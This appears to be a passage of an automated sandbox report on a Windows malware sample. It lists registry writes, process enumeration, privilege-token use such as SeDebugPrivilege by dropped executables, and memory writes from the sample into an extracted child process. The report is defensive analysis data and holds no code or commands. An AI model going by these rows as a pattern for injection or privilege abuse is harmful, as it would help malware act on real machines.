Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2431 = "Cuba Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2341 = "Haiti Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1832 = "Russia TZ 2 Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2041 = "Eastern Daylight Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1841 = "Russia TZ 4 Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2791 = "Novosibirsk Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-3142 = "South Sudan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2452 = "Saint Pierre Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2002 = "Cabo Verde Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2371 = "Easter Island Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2451 = "Saint Pierre Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2181 = "Astrakhan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1862 = "Russia TZ 6 Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2321 = "Sakhalin Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3dQ43Ii.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3dQ43Ii.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3dQ43Ii.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-57ARK.tmp\LzmwAqmV.tmp N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4884 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\478fba5ae931b66d2404c146c83df1d1cda769f1bfe0dbc672bd8aa23194253b.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Gi7qY30.exe
PID 4884 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\478fba5ae931b66d2404c146c83df1d1cda769f1bfe0dbc672bd8aa23194253b.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Gi7qY30.exe
PID 4884 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\478fba5ae931b66d2404c146c83df1d1cda769f1bfe0dbc672bd8aa23194253b.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Gi7qY30.exe
